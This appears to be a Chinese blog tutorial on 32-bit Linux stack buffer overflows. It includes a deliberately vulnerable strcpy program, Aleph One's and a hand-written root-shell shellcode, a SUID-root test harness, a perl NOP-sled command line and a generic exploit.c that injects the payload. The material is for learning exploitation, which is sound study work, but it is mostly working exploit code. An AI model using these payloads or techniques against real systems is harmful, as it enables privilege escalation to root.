• linux缓冲区溢出学习


    漏洞代码:

    //meet.c
    #include<stdio.h>
    /*
     * Copies temp2 into a fixed 400-byte stack buffer and prints
     * "Hello <temp1> <temp2>".  This is the page's deliberately vulnerable
     * target function.
     *
     * Defect: strcpy() never checks the length of temp2, so an argument of
     * 400 or more bytes (terminator included) overruns `name` into whatever
     * the compiler placed above it on the stack -- the rest of the page
     * presumes that is the saved frame pointer and return address.  The
     * defensive form is a bounded copy that always terminates:
     *   snprintf(name, sizeof name, "%s", temp2);
     * Also missing here: `#include <string.h>` (strcpy is implicitly
     * declared) and an explicit return type (implicit int is not valid C99+).
     */
    greeting(char *temp1,char *temp2){
      char name[400];
      strcpy(name,temp2);   /* unbounded copy: the length of temp2 is never checked */
      printf("Hello %s %s\n",temp1,name);
    }
    /*
     * Entry point: passes the first two command-line arguments to greeting()
     * and then echoes them.  There is no argc check: run with fewer than two
     * arguments, argv[1] or argv[2] is NULL and both greeting() and the printf
     * below receive a null pointer where a string is expected (undefined
     * behaviour).  A guard such as `if (argc < 3) return 1;` before the call
     * fixes that.  Implicit-int return type is pre-C99 only.
     */
    main(int argc,char *argv[]){
      greeting(argv[1],argv[2]);
      printf("Bye %s %s\n",argv[1],argv[2]);
    }
    

    调试语句:

    gcc -mpreferred-stack-boundary=2 -o meet -ggdb meet.c

    gdb meet

    list

    b 6

    `perl -e 'print "A"x403'`

    aleph1的shellcode

    //shellcode.c
    /*
     * Aleph One's classic 32-bit Linux x86 shellcode (the page calls it
     * "aleph1's shellcode"; the copy in exploit.c is labelled setuid(0)).
     * The trailing "/bin/sh" is the program path it executes; everything
     * before it is machine code and must stay byte-exact.  Payloads of this
     * kind are what non-executable stacks, ASLR and stack protectors exist to
     * defeat; this tutorial presumes a build and host without them.
     */
    char shellcode[]=
      "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
      "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
      "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
      "\x80\xe8\xdc\xff\xff\xff/bin/sh";
    /*
     * Test harness for the shellcode array above: rather than calling it
     * through a function pointer, main overwrites its own return address.
     * `ret` is a local; the code takes its address, steps two words up the
     * stack and stores the address of `shellcode` there, so that returning
     * from main lands in the shellcode.
     *
     * Nothing here is portable C: pointer arithmetic outside the object `ret`,
     * pointer<->int casts that only fit a 32-bit pointer, and `void main`.
     * It also depends on the exact frame layout the compiler happens to emit
     * (frame pointer kept, no stack protector, no other locals), so any change
     * to the body or to the compiler flags changes where `&ret+2` lands.
     */
    void main(){
      int *ret;
      ret=(int *)&ret+2;       /* assumes saved EBP then the return address sit right above ret -- TODO confirm per toolchain */
      (*ret)=(int)shellcode;   /* overwrite that slot with the shellcode's address (pointer truncated to int on 64-bit) */
    }
    

     获得当前esp值

    #include<stdio.h>
    /*
     * Returns the current stack pointer.  There is no `return` statement: the
     * inline asm moves ESP into EAX and the function relies on EAX being the
     * integer return register of the 32-bit x86 calling convention.  Falling
     * off the end of a non-void function and using the result is undefined
     * behaviour in C, and because the asm declares no outputs an optimiser is
     * free to clobber EAX before the caller reads it.  Only meaningful on
     * 32-bit x86 (movl / %esp); the value is ESP as seen inside get_sp, i.e.
     * after the call pushed the return address, so it differs from the
     * caller's ESP by a small compiler-dependent amount.
     */
    unsigned long get_sp(void){
      __asm__("movl %esp,%eax");   /* result left in EAX and implicitly "returned" */
    }
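    /*
     * Prints the stack pointer reported by get_sp().
     * get_sp() returns unsigned long, so the conversion must be %lx; the
     * original %x expects unsigned int and is undefined behaviour wherever
     * the two sizes differ (any 64-bit build).  On a 32-bit build the output
     * is unchanged.
     */
    int main(void){
      printf("Stack pointer(ESP):0x%lx\n",get_sp());
      return 0;
    }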
    

     perl -e 'print "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";'>sc

    ./meet Mr `perl -e 'print "\x90"x203'``cat sc``perl -e 'print "\x88\xf5\xff\xbf"x89'`

    编写自己的shellcode

    1.编写汇编

    ; 32-bit Linux x86, NASM syntax.  Two system calls are issued via int 0x80
    ; (syscall number in EAX, arguments in EBX, ECX, EDX); the sequence is
    ; specific to the i386 syscall ABI and does not apply to x86-64.
    section .text
    global _start
    _start:
    ; setreuid(0,0)
    xor eax,eax
    mov al,0x46
    xor ebx,ebx
    xor ecx,ecx
    int 0x80
    
    ; execve the shell: the two pushes spell "/bin//sh" on the stack,
    ; EBX = path, ECX = argv (path, NULL), EDX = envp (NULL)
    xor eax,eax
    push eax
    push 0x68732f2f
    push 0x6e69622f
    mov ebx,esp
    push eax
    push ebx
    mov ecx,esp
    xor edx,edx
    mov al,0xb
    int 0x80
    

     2.生成可执行文件

    nasm -f elf sc.asm

    ld -o sc sc.o

    3.提取十六进制代码

    objdump -d ./sc

    [root@localhost root]# objdump -d ./sc
     
    ./sc:     file format elf32-i386
     
    Disassembly of section .text:
     
    08048080 <_start>:
     8048080:       31 c0                   xor    %eax,%eax
     8048082:       b0 46                   mov    $0x46,%al
     8048084:       31 db                   xor    %ebx,%ebx
     8048086:       31 c9                   xor    %ecx,%ecx
     8048088:       cd 80                   int    $0x80
     804808a:       31 c0                   xor    %eax,%eax
     804808c:       50                      push   %eax
     804808d:       68 2f 2f 73 68          push   $0x68732f2f
     8048092:       68 2f 62 69 6e          push   $0x6e69622f
     8048097:       89 e3                   mov    %esp,%ebx
     8048099:       50                      push   %eax
     804809a:       53                      push   %ebx
     804809b:       89 e1                   mov    %esp,%ecx
     804809d:       31 d2                   xor    %edx,%edx
     804809f:       b0 0b                   mov    $0xb,%al
     80480a1:       cd 80                   int    $0x80
    

    4.放到程序里面测试shellcode

    //sc2.c
    /*
     * sc2.c: runs the hand-written shellcode from step 3 as if it were a
     * function.  The byte string is the objdump listing above, byte for byte
     * -- it is instructions, not text, and must not be edited as a string.
     */
    char sc[]= "\x31\xc0" "\xb0\x46" "\x31\xdb" "\x31\xc9" "\xcd\x80" "\x31\xc0" "\x50" "\x68\x2f\x2f\x73\x68" "\x68\x2f\x62\x69\x6e" "\x89\xe3" "\x50" "\x53" "\x89\xe1" "\x31\xd2" "\xb0\x0b" "\xcd\x80";
    /*
     * Casts the array to a function pointer and calls it, i.e. executes data.
     * Converting an object pointer (void *) to a function pointer is not valid
     * portable C (GCC accepts it with a warning), and the call only works if
     * the data segment is mapped executable -- default toolchains today map it
     * non-executable, so this normally faults.  `main()` with implicit int is
     * pre-C99 only.
     */
    main() {
      void (*fp)(void);
      fp=(void *)sc;   /* object pointer -> function pointer: constraint violation in strict C */
      fp();            /* jump into the byte array */
    }

     5.设置SUID并执行

    sudo chown root sc2

    sudo chmod +s sc2

    ./sc2

    通用exploit代码

    //exploit.c
    #include<stdio.h>
    /*
     * Payload copied into the attack buffer by main(): Aleph One's 32-bit
     * Linux shellcode, labelled setuid(0) by the author, ending in the
     * "/bin/sh" path string.  main() measures it with strlen(), so a NUL
     * anywhere before the end would silently truncate the copy.
     */
    char shellcode[]= //setuid(0)
      "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
      "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
      "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
      "\x80\xe8\xdc\xff\xff\xff/bin/sh";
    
    /*
     * Returns the current stack pointer (same helper as in the ESP example
     * above).  No `return` statement: the inline asm moves ESP into EAX and
     * relies on EAX being the integer return register of the 32-bit x86
     * calling convention.  Falling off the end of a non-void function and
     * using the value is undefined behaviour, and the asm declares no outputs,
     * so an optimiser may clobber EAX first.  32-bit x86 only.
     */
    unsigned long get_sp(void){
      __asm__("movl %esp,%eax");   /* result left in EAX and implicitly "returned" */
    }
    /*
     * Builds the attack string and hands it to ./meet as its second argument.
     * Layout of `buffer` (size bytes): first filled end to end with the
     * guessed return address `ret`, then the first half is overwritten with
     * 0x90 (NOP) bytes and the shellcode is copied in right after the
     * midpoint; the last byte is set to NUL so execl sees a C string.
     *
     * argv[1] = size, argv[2] = offset subtracted from ESP, argv[3] = ESP to
     * use instead of get_sp()'s; all optional.  The "Usage:" line is printed
     * unconditionally, even when the arguments are fine.
     *
     * C-level defects (independent of what the program is for):
     *  - atoi, strtoul, malloc, free, strlen and execl are used without
     *    <stdlib.h>, <string.h>, <unistd.h>: implicit declarations; malloc()
     *    is then taken to return int and the pointer is truncated on 64-bit.
     *  - `%x` is used for `long` arguments (esp, ret); the format should be
     *    %lx.
     *  - the word-fill loop steps 4 bytes at a time but only tests `i<size`,
     *    so a size that is not a multiple of 4 writes up to 3 bytes past
     *    `buffer`; with an 8-byte `long` (64-bit) the overrun is larger.
     *  - `i<strlen(shellcode)` compares int with size_t and rescans the string
     *    every iteration; the shellcode is assumed to fit in size/2 bytes.
     *  - malloc()'s result is not checked before use.
     *  - execl's terminating argument should be `(char *)NULL`, not `0`.
     *  - on execl failure the buffer is printed and freed but the error itself
     *    (errno) is never reported.
     */
    int main(int argc,char *argv[1]){   /* `argv[1]` in a parameter is just char **argv; the 1 is ignored */
    int i,offset=0;
    long esp,ret,*addr_ptr;
    char *buffer,*ptr;
    int size=500;                       /* default attack-string length */
    esp=get_sp();                       /* starting guess for the target's stack location */
    if(argc>1) size=atoi(argv[1]);
    if(argc>2) offset=atoi(argv[2]);
    if(argc>3) esp=strtoul(argv[3],NULL,0);
    ret=esp-offset;                     /* value written into the buffer as the return address */
    fprintf(stderr,"Usage:%s<buff_size><offset><esp:0xfff...>\n",argv[0]);
    fprintf(stderr,"ESP:0x%x Offset:0x%x Return:0x%x\n",esp,offset,ret);   /* %x with long arguments */
    buffer=(char *)malloc(size);        /* unchecked: a NULL result is dereferenced below */
    ptr=buffer;
    addr_ptr=(long *)ptr;
    for(i=0;i<size;i+=4){               /* fill with ret, one word per step (see size%4 note above) */
    *(addr_ptr++)=ret;
    }
    for(i=0;i<size/2;i++){              /* first half becomes a NOP (0x90) run */
    buffer[i]='\x90';
    }
    ptr=buffer+size/2;
    for(i=0;i<strlen(shellcode);i++){   /* shellcode follows the NOPs */
    *(ptr++)=shellcode[i];
    }
    buffer[size-1]=0;                   /* terminate so execl receives a C string */
    execl("./meet","meet","Mr.",buffer,0);   /* replaces this process on success; 0 should be (char *)NULL */
    printf("%s\n",buffer);              /* only reached if execl failed */
    free(buffer);
    return 0;
    }
    
  • 原文地址:https://www.cnblogs.com/shanmao/p/2815490.html